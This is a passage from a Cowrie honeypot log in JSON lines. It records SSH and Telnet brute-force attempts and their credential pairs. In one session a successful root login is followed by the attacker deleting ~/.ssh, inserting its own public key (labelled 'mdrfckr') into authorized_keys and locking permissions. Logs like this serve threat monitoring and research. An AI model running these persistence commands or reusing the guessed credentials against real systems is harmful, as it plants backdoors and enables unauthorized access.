@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:57:12.876987Z","src_ip":"212.227.235.229","session":"c4253c405e73"}
{"eventid":"cowrie.login.failed","username":"vscode","password":"vscode","message":"login attempt [vscode/vscode] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:14.007416Z","src_ip":"212.227.235.229","session":"c4253c405e73"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:15.281615Z","src_ip":"212.227.235.229","session":"c4253c405e73"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":33846,"dst_ip":"1.2.3.4","dst_port":22,"session":"19ee7fd18d5e","protocol":"ssh","message":"New connection: 170.64.166.123:33846 (1.2.3.4:22) [session: 19ee7fd18d5e]","sensor":"my-vps","timestamp":"2025-08-31T05:57:15.653718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:57:15.654483Z","src_ip":"170.64.166.123","session":"19ee7fd18d5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:57:15.929003Z","src_ip":"170.64.166.123","session":"19ee7fd18d5e"}
{"eventid":"cowrie.login.failed","username":"dell","password":"Zxc#406&POI","message":"login attempt [dell/Zxc#406&POI] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:17.066878Z","src_ip":"170.64.166.123","session":"19ee7fd18d5e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:18.343494Z","src_ip":"170.64.166.123","session":"19ee7fd18d5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39024,"dst_ip":"1.2.3.4","dst_port":22,"session":"10d5c9524a21","protocol":"ssh","message":"New connection: 212.227.235.229:39024 (1.2.3.4:22) [session: 10d5c9524a21]","sensor":"my-vps","timestamp":"2025-08-31T05:57:20.212755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:57:21.053051Z","src_ip":"212.227.235.229","session":"10d5c9524a21"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:57:21.053737Z","src_ip":"212.227.235.229","session":"10d5c9524a21"}
{"eventid":"cowrie.login.failed","username":"test3","password":"1234567","message":"login attempt [test3/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:26.593845Z","src_ip":"212.227.235.229","session":"10d5c9524a21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41577,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d07d08294d9","protocol":"telnet","message":"New connection: 212.227.125.160:41577 (1.2.3.4:23) [session: 7d07d08294d9]","sensor":"my-vps","timestamp":"2025-08-31T05:57:27.196872Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36824,"dst_ip":"1.2.3.4","dst_port":22,"session":"88ce29d10efe","protocol":"ssh","message":"New connection: 212.227.235.229:36824 (1.2.3.4:22) [session: 88ce29d10efe]","sensor":"my-vps","timestamp":"2025-08-31T05:57:27.907237Z"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:28.395696Z","src_ip":"212.227.235.229","session":"10d5c9524a21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51782,"dst_ip":"1.2.3.4","dst_port":23,"session":"576e17a415c0","protocol":"telnet","message":"New connection: 212.227.235.229:51782 (1.2.3.4:23) [session: 576e17a415c0]","sensor":"my-vps","timestamp":"2025-08-31T05:57:28.799385Z"}
{"eventid":"cowrie.session.closed","duration":5.134078502655029,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:32.330891Z","src_ip":"212.227.125.160","session":"7d07d08294d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36244,"dst_ip":"1.2.3.4","dst_port":22,"session":"b750a6426b24","protocol":"ssh","message":"New connection: 212.227.235.229:36244 (1.2.3.4:22) [session: b750a6426b24]","sensor":"my-vps","timestamp":"2025-08-31T05:57:38.144191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:57:38.145182Z","src_ip":"212.227.235.229","session":"b750a6426b24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:57:38.427426Z","src_ip":"212.227.235.229","session":"b750a6426b24"}
{"eventid":"cowrie.login.failed","username":"mateo","password":"mateo","message":"login attempt [mateo/mateo] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:39.598211Z","src_ip":"212.227.235.229","session":"b750a6426b24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56906,"dst_ip":"1.2.3.4","dst_port":22,"session":"a779e49bda46","protocol":"ssh","message":"New connection: 212.227.125.160:56906 (1.2.3.4:22) [session: a779e49bda46]","sensor":"my-vps","timestamp":"2025-08-31T05:57:40.880880Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:40.883825Z","src_ip":"212.227.235.229","session":"b750a6426b24"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:41.089130Z","src_ip":"212.227.125.160","session":"6bcb4f6be927"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:57:41.364078Z","src_ip":"212.227.125.160","session":"a779e49bda46"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:57:41.365114Z","src_ip":"212.227.125.160","session":"a779e49bda46"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:57:41.939574Z","src_ip":"212.227.235.229","session":"88ce29d10efe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:57:41.940265Z","src_ip":"212.227.235.229","session":"88ce29d10efe"}
{"eventid":"cowrie.login.failed","username":"test3","password":"1234567","message":"login attempt [test3/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:43.629584Z","src_ip":"212.227.125.160","session":"a779e49bda46"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:45.300807Z","src_ip":"212.227.125.160","session":"a779e49bda46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38866,"dst_ip":"1.2.3.4","dst_port":22,"session":"aad1c8ea1208","protocol":"ssh","message":"New connection: 212.227.235.229:38866 (1.2.3.4:22) [session: aad1c8ea1208]","sensor":"my-vps","timestamp":"2025-08-31T05:57:47.421766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:57:47.422465Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:57:47.662079Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.login.success","username":"root","password":"rich","message":"login attempt [root/rich] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:57:48.660374Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:57:49.157716Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:57:49.158600Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:57:49.159424Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:49.400510Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:57:49.938730Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:57:49.939597Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:57:50.180943Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:50.181821Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38876,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5d7cec639c0","protocol":"ssh","message":"New connection: 212.227.235.229:38876 (1.2.3.4:22) [session: b5d7cec639c0]","sensor":"my-vps","timestamp":"2025-08-31T05:57:50.440660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:57:50.441662Z","src_ip":"212.227.235.229","session":"b5d7cec639c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:57:50.701459Z","src_ip":"212.227.235.229","session":"b5d7cec639c0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:51.782586Z","src_ip":"212.227.235.229","session":"b5d7cec639c0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:53.045921Z","src_ip":"212.227.235.229","session":"b5d7cec639c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53842,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2e21401d463","protocol":"ssh","message":"New connection: 212.227.235.229:53842 (1.2.3.4:22) [session: c2e21401d463]","sensor":"my-vps","timestamp":"2025-08-31T05:57:53.288512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:57:53.289402Z","src_ip":"212.227.235.229","session":"c2e21401d463"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:57:53.532894Z","src_ip":"212.227.235.229","session":"c2e21401d463"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:57:54.549634Z","src_ip":"212.227.235.229","session":"c2e21401d463"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:54.793745Z","src_ip":"212.227.235.229","session":"aad1c8ea1208"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:54.794798Z","src_ip":"212.227.235.229","session":"c2e21401d463"}
{"eventid":"cowrie.session.closed","duration":31.277408361434937,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:00.076729Z","src_ip":"212.227.235.229","session":"576e17a415c0"}
